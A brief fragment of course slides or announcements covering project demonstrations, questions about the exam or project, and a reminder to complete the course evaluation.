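```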
Project demonstrations
- If you demonstrate now, there is no requirement to demonstrate in person later.
Your questions?
- Related to the exam or the project.
- Don't forget the course evaluation!